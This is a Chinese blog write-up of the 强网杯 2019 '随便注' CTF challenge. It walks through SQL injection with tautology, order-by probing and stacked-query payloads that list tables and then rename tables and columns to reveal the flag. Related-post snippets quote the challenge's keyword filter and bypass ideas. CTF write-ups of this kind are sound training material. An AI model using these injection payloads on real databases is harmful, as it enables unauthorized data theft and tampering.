[强网杯 2019]随便注_wp

最新推荐文章于 2024-11-04 09:03:52 发布
最新推荐文章于 2024-11-04 09:03:52 发布
阅读量590 收藏 1
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53738407/article/details/122365848
版权
本文详细讲述了在强网杯2019竞赛中遇到的SQL注入挑战,包括利用堆叠注入payload绕过关键字过滤,通过表名和字段爆破获取flag的过程。重点展示了payload的构造和策略调整,如改名、列名修改等技术应用。
摘要由CSDN通过智能技术生成

文章目录

[强网杯 2019]随便注

判断

  • 看到表单提交,第一反应,万能密码,看存不存在SQL注入,以及爆开会得到什么

  • 1’ or ‘1’='1
    在这里插入图片描述

  • 显然存在sql注入,其实这个题的题目已经告诉我们了,直接注就好

注入

  • 判断字段数

  • 当1' order by 3;
    在这里插入图片描述
    根据回显可判断出字段数为2

  • 但当进行后续操作时,发现过滤了一系列关键字
    在这里插入图片描述

堆叠注入

  • 0';show databases;

  • 在这里插入图片描述
    看来是可以成功的

  • 0';show tables;查表名

  • 在这里插入图片描述

  • 0';show columns from words;爆表words

  • 在这里插入图片描述

0';show columns from `1919810931114514`;
  • 在这里插入图片描述
    便可爆出flag字段
    表名为数字时,要用反引号包起来查询

其实到这我要选择停止了,因为无法前行;但发现了这个语句desc;

desc查看表结构的详细信息 desctable_name; PS:此处desc是describe的缩写,用法:desc表名/查询语句
  • 0';desc words;
  • 在这里插入图片描述
    查看words表的结构,发现一共有id和data两列。
    此处可以猜测我们提交查询的窗口就是在这个表里查询数据的,要是在数字表里查,那我万能密码可不就把flag爆出来了,多好
  • 那么查询语句很有可能是 : selsect id,data from words where id =

因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的万能密码爆出表所有内容就可以看到flag了

payload

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;

修改完后
再万能密码一次就得到flag了在这里插入图片描述

Acco_30_L
关注
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1429
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 638
前言 本题知识点:SQL堆叠WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
[强网杯 2019]随便 wp
Leaf_initial的博客
04-12 258
这里想先用union联合入来获取当前database,但是被过滤了,由这个preg_match正则匹配可以看出这道题是堆叠入。那么 我们是不是可以通过修改带flag字段的表的名字为words表 然后把flag 字段修改为id。发现没结果了, 原因是新的id列中的值已经变为flag值了 所以查询inject=1查不到。sql入老传统,上来先判断入点,这题是字符型入。修改新的words表中的flag列名为id。判断能出来什么东西,好样的,啥用没有。前面一样,先查出所有表,然后使用。
[强网杯 2019]随便wp
vegetable223的博客
11-28 255
强网杯2019随便 一看题目就知道这是sql入,只听过没学过,看来这题只能全程跟着大神的思路走了。 1.打开靶机,随便提交,发现似乎是把 PHP 查询的原始结果之间返回了 2.输入 select 发现了过滤语句,过滤了 select,update,delete,drop,insert,where 和 . return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 测试一下有没有入。?inject=1’%23
[强网杯 2019]随便WP
u011250160的博客
10-13 131
判断入类型 说明是字符类型的入 联合查询入 发现正则匹配过滤了关键词 堆叠查询入 到这里就知道flag了 接下来查询flag的内容 预编译执行语句 说明set与prepare关键词被拦截 strstr函数对大小写敏感 大写绕过 修改表名查询 原题目查询的数据表为words。 既然没过滤 alert 和 rename,那就可以把表和列改名。 先把 words 改为其他,再把1919810931114514改为 words, 然后把新的 words 表里的 flag 列改为 id ,这样
[强网杯 2019]随便&[GYCTF2020]Blacklist -wp
freerats的博客
08-01 753
[GYCTF2020]Blacklist算是随便的加强版,环境基本一致,不过blacklist禁掉了set和rename,所以随便的两种常规方法都做不了。 一样的堆叠入, 1';show databases;# 1';show tables;# 这里使用的新姿势就是handler …open. handler…open语句打开一个表,使其可以使用后续handler … read语句访问,该表对象未被其他会话共享,并且在会话调用handler … close或会话终止之前不会关闭 也就是说可以直.
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4297
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
BUUCTF [强网杯 2019]随便
qq_42158602的博客
01-09 1131
打开题目看见一个输入框 输入’报错 应该是有sql入了 使用 1’ # 正确显示 直接上 order by 1' order by 3 # 测试1,2正常,3报错 此时天真的我以为我已经离成功不远了~~ 启动联合查询 -1' union select 1,2 # 提交 继续 ...
[Neepuctf2021]wp
Huamang的博客
05-27 395
一个比较小众的比赛,是别学校的招新赛,不过也对外开放 记录一点有点难度的题 随便2.0 是原题“[强网杯 2019]随便”的变式,过滤的很多 return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject); 空格都可以用%0a绕过,但是rename被ban了,改名不能用了,set被过滤,预处理语句也不能用了,handle也不能用了,网上流传的这三个方法都不行
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3823
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
[强网杯 2019]随便
ChanCherry的博客
11-19 1011
很感谢可以在BUU平台上复现这道题,感谢赵师傅!这篇wp借鉴了大佬的,为了自己日后学习需要就写了,大佬不喜勿喷QAQ 首先要知道堆叠入的原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么...
网络安全设备Bypass功能介绍及分析
ztc131450的博客
10-31 1385
一般的应用方法为:在断电的情况下,设备处于Bypass打开状态,然后设备上电后,由于BIOS可以对Bypass作操作,所以在BIOS接管设备后,Bypass仍然处于打开状态,然后OS启动,当OS启动后,一般会执行GPIO 的Bypass程序,将Bypass关闭,这样可以应用程序就可以发挥作用了。以上图为例,如果对GPIO27 的Bit3 写入“0”或“1”,就可以对LAN 1/2 所组成的Bypass进行开关的控制,同理如果操作对象为GPIO 28 ,则可以实现对LAN3/4 Bypass的控制。
网络安全从入门到精通 (第二章-1) Web安全前端基础
ztc131450的博客
11-02 688
1,前端是什么?   网站一般用两部分组成,前端负责展示,后端负责处理请求。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1356
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
ZXW_NUDT的博客
10-19 9318
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
网络安全(黑客)自学
白帽子凯哥聊黑客
10-27 1187
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全渗透实际案例
专研计算机网络,数据通信,网络安全,系统集成
11-02 1137
该案例演示了如何通过信息收集、漏洞扫描、漏洞利用和后渗透测试等步骤,对目标系统进行完整的渗透测试。通过详细的操作步骤和修复建议,可以帮助安全人员更好地防御类似攻击。意:渗透测试应仅限于合法授权的网络或系统。未经授权的渗透测试属于非法行为。步骤编号步骤名称操作说明代码示例1环境准备确保Kali Linux及相关工具已安装,如NmapMetasploitNetcat等。无2信息收集使用Nmap扫描目标系统,识别开放端口和服务版本。3确定服务漏洞。
网络安全等级保护制度详解:一文掌握核心要点
最新发布
A526847的博客
11-04 641
网络安全等级保护制度是我国网络安全保障体系的重要组成部分,对于保障国家关键信息基础设施安全、维护社会稳定和促进经济发展具有重要意义。通过深入理解等保制度的核心要点和实施步骤,我们可以更好地应对网络安全挑战,共同构建一个安全、可信、有序的网络环境。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-31 948
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
强网杯 2022 谍影重重wp
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Acco_30_L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值